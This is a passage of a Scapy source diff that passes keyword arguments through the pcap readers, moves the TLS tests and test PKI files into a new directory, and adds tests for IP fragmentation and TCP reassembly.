**kwargs) except StopIteration: raise EOFError diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index da6ca39a2ef..ad734a7b04b 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -89,9 +89,12 @@ def scapy_path(fname): class no_debug_dissector: """Context object used to disable conf.debug_dissector""" + def __init__(self, reverse=False): + self.new_value = reverse + def __enter__(self): self.old_dbg = conf.debug_dissector - conf.debug_dissector = False + conf.debug_dissector = self.new_value def __exit__(self, exc_type, exc_value, traceback): conf.debug_dissector = self.old_dbg diff --git a/scapy/utils.py b/scapy/utils.py index 6c6fd2dfa7e..211378cc9eb 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1411,15 +1411,15 @@ def __enter__(self): # type: () -> PcapReader return self - def read_packet(self, size=MTU): - # type: (int) -> Packet + def read_packet(self, size=MTU, **kwargs): + # type: (int, **Any) -> Packet rp = super(PcapReader, self)._read_packet(size=size) if rp is None: raise EOFError s, pkt_info = rp try: - p = self.LLcls(s) # type: Packet + p = self.LLcls(s, **kwargs) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -1436,9 +1436,9 @@ def read_packet(self, size=MTU): p.wirelen = pkt_info.wirelen return p - def recv(self, size=MTU): # type: ignore - # type: (int) -> Packet - return self.read_packet(size=size) + def recv(self, size=MTU, **kwargs): # type: ignore + # type: (int, **Any) -> Packet + return self.read_packet(size=size, **kwargs) def __next__(self): # type: ignore # type: () -> Packet @@ -1720,7 +1720,7 @@ def _read_block_dsb(self, block, size): # TLS Key Log if secrets_type == 0x544c534b: - if getattr(conf, "tls_nss_keys", False) is False: + if getattr(conf, "tls_sessions", False) is False: warning("PcapNg: TLS Key Log available, but " "the TLS layer is not loaded! Scapy won't be able " "to decrypt the packets.") @@ -1739,8 +1739,8 @@ def _read_block_dsb(self, block, size): else: # Note: these attributes are only available when the TLS # layer is loaded. - conf.tls_nss_keys = keys # type: ignore - conf.tls_session_enable = True # type: ignore + conf.tls_nss_keys = keys + conf.tls_session_enable = True else: warning("PcapNg: Unknown DSB secrets type (0x%x)!", secrets_type) @@ -1757,15 +1757,15 @@ def __enter__(self): # type: () -> PcapNgReader return self - def read_packet(self, size=MTU): - # type: (int) -> Packet + def read_packet(self, size=MTU, **kwargs): + # type: (int, **Any) -> Packet rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError s, (linktype, tsresol, tshigh, tslow, wirelen, comment) = rp try: cls = conf.l2types.num2layer[linktype] # type: Type[Packet] - p = cls(s) # type: Packet + p = cls(s, **kwargs) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -1781,9 +1781,8 @@ def read_packet(self, size=MTU): p.comment = comment return p - def recv(self, size=MTU): # type: ignore - # type: (int) -> Packet - return self.read_packet() + def recv(self, size: int = MTU, **kwargs: Any) -> 'Packet': # type: ignore + return self.read_packet(size=size, **kwargs) class GenericPcapWriter(object): @@ -2383,8 +2382,8 @@ def _convert_erf_timestamp(self, t): # The details of ERF Packet format can be see here: # https://www.endace.com/erf-extensible-record-format-types.pdf - def read_packet(self, size=MTU): - # type: (int) -> Packet + def read_packet(self, size=MTU, **kwargs): + # type: (int, **Any) -> Packet # General ERF Header have exactly 16 bytes hdr = self.f.read(16) @@ -2414,7 +2413,7 @@ def read_packet(self, size=MTU): pb = s[2:size] from scapy.layers.l2 import Ether try: - p = Ether(pb) # type: Packet + p = Ether(pb, **kwargs) # type: Packet except KeyboardInterrupt: raise except Exception: diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index f43e870c136..25fbb6bd1d6 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -2,6 +2,7 @@ "testfiles": [ "test/*.uts", "test/scapy/layers/*.uts", + "test/scapy/layers/tls/*.uts", "test/contrib/*.uts", "test/tools/*.uts", "test/contrib/automotive/*.uts", @@ -10,8 +11,7 @@ "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", "test/contrib/automotive/xcp/*.uts", - "test/contrib/automotive/autosar/*.uts", - "test/tls/tests_tls_netaccess.uts" + "test/contrib/automotive/autosar/*.uts" ], "remove_testfiles": [ "test/windows.uts", @@ -21,9 +21,7 @@ "onlyfailed": true, "preexec": { "test/contrib/*.uts": "load_contrib(\"%name%\")", - "test/cert.uts": "load_layer(\"tls\")", - "test/sslv2.uts": "load_layer(\"tls\")", - "test/tls*.uts": "load_layer(\"tls\")" + "test/scapy/layers/tls/*.uts": "load_layer(\"tls\")" }, "kw_ko": [ "osx", diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index c065cb604cb..5aaab483f48 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -2,6 +2,7 @@ "testfiles": [ "test\\*.uts", "test\\scapy\\layers\\*.uts", + "test\\scapy\\layers\\tls\\*.uts", "test\\tls\\tests_tls_netaccess.uts", "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\scanner\\*.uts", @@ -20,9 +21,7 @@ "onlyfailed": true, "preexec": { "test\\contrib\\*.uts": "load_contrib(\"%name%\")", - "test\\cert.uts": "load_layer(\"tls\")", - "test\\sslv2.uts": "load_layer(\"tls\")", - "test\\tls*.uts": "load_layer(\"tls\")" + "test\\scapy\\layers\\tls\\*.uts": "load_layer(\"tls\")" }, "kw_ko": [ "brotli", diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index e82fe0f8575..c231de57f85 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -2,12 +2,12 @@ "testfiles": [ "*.uts", "scapy\\layers\\*.uts", - "test\\contrib\\automotive\\obd\\*.uts", - "test\\contrib\\automotive\\gm\\*.uts", - "test\\contrib\\automotive\\bmw\\*.uts", - "test\\contrib\\automotive\\*.uts", - "test\\contrib\\automotive\\autosar\\*.uts", - "tls\\tests_tls_netaccess.uts", + "scapy\\layers\\tls\\*.uts", + "contrib\\automotive\\obd\\*.uts", + "contrib\\automotive\\gm\\*.uts", + "contrib\\automotive\\bmw\\*.uts", + "contrib\\automotive\\*.uts", + "contrib\\automotive\\autosar\\*.uts", "contrib\\*.uts" ], "remove_testfiles": [ @@ -18,9 +18,7 @@ "onlyfailed": true, "preexec": { "contrib\\*.uts": "load_contrib(\"%name%\")", - "cert.uts": "load_layer(\"tls\")", - "sslv2.uts": "load_layer(\"tls\")", - "tls*.uts": "load_layer(\"tls\")" + "scapy\\layers\\tls\\*.uts": "load_layer(\"tls\")" }, "format": "html", "kw_ko": [ diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index ede976bc0f5..4ced520357b 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -607,7 +607,7 @@ assert unanswered_packets[0].diagnosticSessionType == 4 = Analyze multiple UDS messages udsmsgs = sniff(offline=scapy_path("test/pcaps/ecu_trace.pcap.gz"), - session=ISOTPSession, session_kwargs={"use_ext_address":False, "basecls":UDS}, + session=ISOTPSession(use_ext_address=False, basecls=UDS), count=50, timeout=3) assert len(udsmsgs) == 50 @@ -638,7 +638,7 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_address":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) + udsmsgs = sniff(session=ISOTPSession(supersession=session, use_ext_address=False, basecls=UDS), count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 @@ -668,12 +668,12 @@ session = EcuSession() conf.contribs['CAN']['swap-bytes'] = True with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) + gmlanmsgs = sniff(session=ISOTPSession(supersession=session, rx_id=[0x241, 0x641, 0x101], basecls=GMLAN), count=2, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 1 after change to diagnostic mode") assert len(ecu.supported_responses) == 1 assert ecu.state == EcuState(session=3) - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession(supersession=session, rx_id=[0x241, 0x641, 0x101], basecls=GMLAN), count=6, opened_socket=sock) ecu = session.ecu print("Check 2 after some more messages were read1") assert len(ecu.supported_responses) == 3 @@ -681,13 +681,13 @@ with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: assert ecu.state.session == 3 print("assert 1") assert ecu.state.communication_control == 1 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession(supersession=session, rx_id=[0x241, 0x641, 0x101], basecls=GMLAN), count=2, opened_socket=sock) ecu = session.ecu print("Check 3 after change to programming mode (bootloader)") assert len(ecu.supported_responses) == 4 assert ecu.state.session == 2 assert ecu.state.communication_control == 1 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession(supersession=session, rx_id=[0x241, 0x641, 0x101], basecls=GMLAN), count=6, opened_socket=sock) ecu = session.ecu print("Check 4 after gaining security access") assert len(ecu.supported_responses) == 6 @@ -703,8 +703,8 @@ conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 conf.contribs['CAN']['swap-bytes'] = True conf.debug_dissector = True -gmlanmsgs = sniff(offline=scapy_path("test/pcaps/gmlan_trace.pcap.gz"), session=ISOTPSession, - session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, +gmlanmsgs = sniff(offline=scapy_path("test/pcaps/gmlan_trace.pcap.gz"), + session=ISOTPSession(supersession=session, rx_id=[0x241, 0x641, 0x101], basecls=GMLAN), count=200, timeout=6) ecu = session.ecu diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index de7f731b2e8..b2b7295805d 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -726,7 +726,7 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 241 [3] 30 00 00 vcan0 541 [5] 21 AA AA AA AA''') -pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_address": False}) +pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession(use_ext_address=False), timeout=1) assert len(pkts) == 6 if not len(pkts): @@ -809,13 +809,6 @@ isotp = pkts[0] assert isotp.data == dhex("") assert (isotp.rx_id == 0x241) -= ISOTPSession tests - -ses = ISOTPSession() -ses.on_packet_received(None) -ses.on_packet_received([None, None]) -assert True - = Receive a two-frame ISOTP message with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: diff --git a/test/pcaps/tls_tcp_frag_withnss.pcap.gz b/test/pcaps/tls_tcp_frag_withnss.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..a9c19fcc770784c9103b6bac3d120c0aaae4d2fd GIT binary patch literal 5666 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 Ik~kg!02pWvEC2ui literal 0 HcmV?d00001 diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index e16c769e4bc..e767afcbad9 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -82,6 +82,16 @@ sniff(offline=tmp_file, session=IPSession, prn=callback) assert len(dissected_packets) == 1 assert raw(dissected_packets[0]) == raw(packet) += IPSession - contains non-IP packets + +pkts = fragment(IP(dst="10.0.0.5")/ICMP()/("X"*1500)) +pkts.insert(1, ARP()) +assert len(pkts) == 3 + +pkts = sniff(offline=pkts, session=IPSession) +assert len(pkts) == 2 +assert pkts[1].load == b"X" * 1500 + = StringBuffer buffer = StringBuffer() @@ -150,6 +160,25 @@ assert len(frags2) == 2 assert len(frags2[0]) == 20 + paylen - paylen % 8 assert len(frags2[1]) == 20 + 1 + paylen % 8 += fragment() with fragsize lower than 8 +paylen = 5 +fragsize = paylen +frags1 = fragment(IP() / ("X" * paylen), paylen) +assert len(frags1) == 1 +assert bytes(frags1[0].payload) == b"X" * paylen + +fragsize = paylen + 1 +frags2 = fragment(IP() / ("X" * paylen), fragsize) +assert len(frags2) == 1 +assert bytes(frags2[0].payload) == b"X" * paylen + +paylen = 16 +fragsize = 5 +frags3 = fragment(IP() / ("X" * paylen), fragsize) +assert len(frags3) == 2 +assert bytes(frags3[0].payload) == b"X" * 8 +assert bytes(frags3[1].payload) == b"X" * 8 + = defrag() nonfrag, unfrag, badfrag = defrag(frags) assert not nonfrag @@ -161,7 +190,7 @@ defrags = defragment(frags) * we should have one single packet assert len(defrags) == 1 * which should be the same as pkt reconstructed -assert defrags[0] == IP(raw(pkt)) +assert bytes(defrags[0]) == bytes(pkt) = defragment() uses timestamp of last fragment payloadlen, fragsize = 100, 8 @@ -191,10 +220,8 @@ b = base64.b64decode('bnmYJ63mREVTUwEACABFAAV0U8UgrDIR+kEEAgIECv0DxApz1F5olFRytj c = base64.b64decode('bnmYJ63mREVTUwEACABFAAFHU8UBWDIRHcMEAgIECv0DxDtlufeCT1zQktat4aEVA8MF0FO1sNbpEQtqfu5Al//OJISaRvtaArR/tLUj2CoZjS7uEnl7QpP/Ui/gR0YtyLurk9yTw7Vei0lSz4cnaOJqDiTGAKYwzVxjnoR1F3n8lplgQaOalVsHx9UAAQABAAADLAAEobkBA8epAAEAAQAAAywABKG5AQzHvwABAAEAAAMsAASnmYIMx5MAAQABAAADLAAEp5mCDcn9AAEAAQAAAqUABKeZhAvKFAABAAEAAAOEAAShuQIfyisAAQABAAADhAAEobkCKcpCAAEAAQAAA4QABKG5AjPKWQABAAEAAAOEAAShuQI9ynAAAQABAAADhAAEobkCC8nPAAEAAQAAA4QABKG5AgzJ5gABAAEAAAOEAASnmYQMAAApIAAAAAAAAAA=') d = base64.b64decode('////////REVTUwEACABFAABOawsAAIARtGoK/QExCv0D/wCJAIkAOry/3wsBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEAABYP/WUAAB6N4XIAAB6E4XsAAACR/24AADyEw3sAABfu6BEAAAkx9s4AABXB6j4AAANe/KEAAAAT/+wAAB7z4QwAAEuXtGgAAB304gsAABTB6z4AAAdv+JAAACCu31EAADm+xkEAABR064sAABl85oMAACTw2w8AADrKxTUAABVk6psAABnF5joAABpA5b8AABjP5zAAAAqV9WoAAAUW+ukAACGS3m0AAAEP/vAAABoa5eUAABYP6fAAABX/6gAAABUq6tUAADXIyjcAABpy5Y0AABzb4yQAABqi5V0AAFXaqiUAAEmRtm4AACrL1TQAAESzu0wAAAzs8xMAAI7LcTQAABxN47IAAAbo+RcAABLr7RQAAB3Q4i8AAAck+NsAABbi6R0AAEdruJQAAJl+ZoEAABDH7zgAACOA3H8AAAB5/4YAABQk69sAAEo6tcUAABJU7asAADO/zEAAABGA7n8AAQ9L8LMAAD1DwrwAAB8F4PoAABbG6TkAACmC1n0AAlHErjkAABG97kIAAELBvT4AAEo0tcsAABtC5L0AAA9u8JEAACBU36sAAAAl/9oAABBO77EAAA9M8LMAAA8r8NQAAAp39YgAABB874MAAEDxvw4AAEgyt80AAGwsk9MAAB1O4rEAAAxL87QAADtmxJkAAATo+xcAAAM8/MMAABl55oYAACKh3V4AACGj3lwAAE5ssZMAAC1x0o4AAAO+/EEAABNy7I0AACYp2dYAACb+2QEAABB974IAABc36MgAAA1c8qMAAAf++AEAABDo7xcAACLq3RUAAA8L8PQAAAAV/+oAACNU3KsAABBv75AAABFI7rcAABuH5HgAABAe7+EAAB++4EEAACBl35oAAB7c4SMAADgJx/YAADeVyGoAACKN3XIAAA/C8D0AAASq+1UAAOHPHjAAABRI67cAAABw/48=') -old_debug_dissector = conf.debug_dissector -conf.debug_dissector = 0 -plist = PacketList([Ether(x) for x in [a, b, c, d]]) -conf.debug_dissector = old_debug_dissector +with no_debug_dissector(): + plist = PacketList([Ether(x) for x in [a, b, c, d]]) left, defragmented, errored = defrag(plist) assert len(left) == 1 @@ -465,6 +492,63 @@ pkt2.len = 0 pkt3 = IP(raw(pkt2)) assert pkt3.load == data += TCPSession: test tcp_reassemble with variable orders + +class CustomPacket(Packet): + fields_desc = [ + ByteField("len", 0), + StrLenField("a", 0, length_from=lambda pkt: pkt.len - 1), + ] + @classmethod + def tcp_reassemble(cls, data, metadata, session): + length = struct.unpack("!B", data[:1])[0] + if len(data) < length: + return None + return CustomPacket(data) + + +# above we have a CustomPacket that is X bytes long. +bind_layers(TCP, CustomPacket, sport=12345) + +with no_debug_dissector(reverse=True): + # incremental order + pkts = sniff(offline=[ + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x05a", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", + ], session=TCPSession) + assert pkts[0][CustomPacket].a == b"abcd" + # same with a pcapng + tmp_file = get_temp_file() + wrpcap(tmp_file, [ + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x05a", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", + ]) + pkts = sniff(offline=tmp_file, session=TCPSession) + assert pkts[0][CustomPacket].a == b"abcd" + # messed up order: fragments 2 and 3 arrive in the wrong order + pkts = sniff(offline=[ + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x05a", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", + ], session=TCPSession) + assert pkts[0][CustomPacket].a == b"abcd" + # messed up order: fragment 1 arrives not in first position + pkts = sniff(offline=[ + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=6)/"e", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=4)/"c", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=3)/"b", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=5)/"d", + IP(dst="1.1.1.1", src="2.2.2.2")/TCP(sport=12345, dport=12, seq=1)/b"\x06a", + ], session=TCPSession) + assert pkts[0][CustomPacket].a == b"abcde" + +split_layers(TCP, CustomPacket, sport=12345) + = Layer binding @@ -500,9 +584,8 @@ value == 26908070 test.i2repr("", value) == '7:28:28.70' = IPv4 - UDP null checksum -conf.debug_dissector = False -IP(raw(IP()/UDP()/Raw(b"\xff\xff\x01\x6a")))[UDP].chksum == 0xFFFF -conf.debug_dissector = True +with no_debug_dissector(): + IP(raw(IP()/UDP()/Raw(b"\xff\xff\x01\x6a")))[UDP].chksum == 0xFFFF = IPv4 - (IP|UDP|TCP|ICMP)Error query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() diff --git a/test/tls/__init__.py b/test/scapy/layers/tls/__init__.py similarity index 100% rename from test/tls/__init__.py rename to test/scapy/layers/tls/__init__.py diff --git a/test/cert.uts b/test/scapy/layers/tls/cert.uts similarity index 100% rename from test/cert.uts rename to test/scapy/layers/tls/cert.uts diff --git a/test/tls/example_client.py b/test/scapy/layers/tls/example_client.py old mode 100755 new mode 100644 similarity index 100% rename from test/tls/example_client.py rename to test/scapy/layers/tls/example_client.py diff --git a/test/tls/example_server.py b/test/scapy/layers/tls/example_server.py old mode 100755 new mode 100644 similarity index 100% rename from test/tls/example_server.py rename to test/scapy/layers/tls/example_server.py diff --git a/test/tls/pki/ca_cert.pem b/test/scapy/layers/tls/pki/ca_cert.pem similarity index 100% rename from test/tls/pki/ca_cert.pem rename to test/scapy/layers/tls/pki/ca_cert.pem diff --git a/test/tls/pki/ca_key.pem b/test/scapy/layers/tls/pki/ca_key.pem similarity index 100% rename from test/tls/pki/ca_key.pem rename to test/scapy/layers/tls/pki/ca_key.pem diff --git a/test/tls/pki/cli_cert.pem b/test/scapy/layers/tls/pki/cli_cert.pem similarity index 100% rename from test/tls/pki/cli_cert.pem rename to test/scapy/layers/tls/pki/cli_cert.pem diff --git a/test/tls/pki/cli_key.pem b/test/scapy/layers/tls/pki/cli_key.pem similarity index 100% rename from test/tls/pki/cli_key.pem rename to test/scapy/layers/tls/pki/cli_key.pem diff --git a/test/tls/pki/srv_cert.pem b/test/scapy/layers/tls/pki/srv_cert.pem similarity index 100% rename from test/tls/pki/srv_cert.pem rename to test/scapy/layers/tls/pki/srv_cert.pem diff --git a/test/tls/pki/srv_key.pem b/test/scapy/layers/tls/pki/srv_key.pem similarity index 100% rename from test/tls/pki/srv_key.pem rename to test/scapy/layers/tls/pki/srv_key.pem diff --git a/test/sslv2.uts b/test/scapy/layers/tls/sslv2.uts similarity index 99% rename from test/sslv2.uts rename to test/scapy/layers/tls/sslv2.uts index bde0a9e0d96..aeab19ba0aa 100644 --- a/test/sslv2.uts +++ b/test/scapy/layers/tls/sslv2.uts @@ -85,7 +85,7 @@ mk_enc.decryptedkey is None = Reading SSLv2 session - Importing server compromised key import os -filename = scapy_path("/test/tls/pki/srv_key.pem") +filename = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") rsa_key = PrivKeyRSA(filename) t.tls_session.server_rsa_key = rsa_key @@ -278,5 +278,5 @@ s.wcs.cipher.iv == b'\x01'*8 ############################ Automaton behaviour ############################## ############################################################################### -# see test/tls/tests_tls_netaccess.uts +# see 